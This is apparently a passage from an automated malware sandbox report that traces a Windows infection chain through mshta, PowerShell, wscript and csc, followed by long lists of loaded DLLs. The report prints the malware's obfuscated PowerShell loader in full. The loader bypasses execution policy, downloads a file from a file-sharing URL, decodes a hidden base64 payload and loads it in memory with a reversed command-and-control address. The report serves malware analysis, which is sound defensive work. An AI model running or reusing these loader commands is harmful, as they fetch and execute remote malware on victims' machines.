vc3NpYmxldGhpbmdzZm9yZW50aXJldGltZXRvZ2l2ZW1lYmVzdC52QnMiLDAsMCk7c3RBclQtc0xlZXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudkJzIg=='+[cHar]34+'))')))"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXEJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs" Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2022.tmp" "c:\Users\user\AppData\Local\Temp\w0uathue\CSC6F7F1D769E649D6AA11CFF4BFABFB3.TMP"Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnaEdhaW1hZ2VVcmwgPSBEZndodHRwczovLzMxMDUuZmlsZScrJ21haWwuY29tL2FwaS8nKydmaWxlL2dldD9maScrJ2xla2V5PXNoVFAnKydIYkNQWDhvLWxPJysndENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBEZnc7aEdhd2ViQ2xpZW50ICcrJz0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtoR2EnKydpbWFnZUJ5dGVzID0gaEdhd2ViQ2xpZW50LkQnKydvd25sb2FkJysnRGF0YShoR2FpbWFnZVVybCk7aEdhaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaEdhaW1hZ2VCeXRlcyk7aEdhc3RhcnRGbGFnID0gRGZ3PDxCQVNFNjRfU1RBUlQ+PkRmdztoR2FlbmRGbGFnID0gRGYnKyd3PDxCQVNFNjRfRU5EPj5EZnc7aEdhc3RhcnRJbmRleCA9IGhHYWltYWdlVGV4dCcrJy5JbmRleE9mKGhHYXN0YXJ0RmxhZyk7aEdhZW5kSW5kZXggPSBoR2FpbWFnZVRleHQuSW5kZXhPZicrJyhoR2FlbmRGbGFnKTtoR2FzdGFydEluZGV4IC1nZSAwIC1hbmQgaEdhZW5kSW5kZXggLWd0IGhHYXMnKyd0YXJ0SW5kZXg7aEdhc3RhcnRJbmRleCArPSBoR2FzdGFydEYnKydsYWcuTGVuZ3RoO2hHYWJhc2U2NExlbmd0aCA9IGhHYWVuZEluZGV4IC0gaEdhc3RhcicrJ3RJbmRleDtoR2FiYXNlNjRDb21tYW5kID0gaEdhaW1hZ2VUZXh0LlN1YnN0cmluZyhoR2FzdGEnKydydEluZGV4LCBoR2FiYXNlNjRMZW5ndGgpO2hHYWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGhHYWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBOOVkgRm9yRWFjaC1PYmplY3QgeyBoR2FfIH0pWy0xLi4tKGhHYWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aEdhY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhoR2FiJysnYScrJ3NlNjRSZXZlcnNlZCk7aEdhbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGhHYWNvbW1hbmRCeXRlcyk7aEdhdmFpTScrJ2V0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZCgnKydEZndWQUlEZncpO2hHYXZhaU1ldGhvZC5JbnZva2UoaEdhbnVsbCwgQChEZnd0eHQuUlRDQ0NSVi82MjIvNTEyLjgyMS41OS4zMi8vOnB0dGhEZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2FzcG5ldF9jb21waWxlckRmdywgRGZ3ZGVzYXRpdmFkb0RmdywgRGZ3ZGVzYXRpdicrJ2FkbycrJ0RmdyxEZndkZXNhdGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3ZGVzYXRpdmFkb0RmdyxEZndkZXNhJysndGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3MURmdyxEZndkJysnZXNhdGl2YWRvRGZ3KSk7JykgIC1jUkVwTEFDRShbQ2hhcl02OCtbQ2hhcl0xMDIrW0NoYXJdMTE5KSxbQ2hhcl0zOS1jUkVwTEFDRSAgJ045WScsW0NoYXJdMTI0LVJlUExBQ0UgIChbQ2hhcl0xMDQrW0NoYXJdNzErW0NoYXJdOTcpLFtDaGFyXTM2KXwgLiggJGVOdjpjb21zUEVjWzQsMjQsMjVdLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')"Jump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
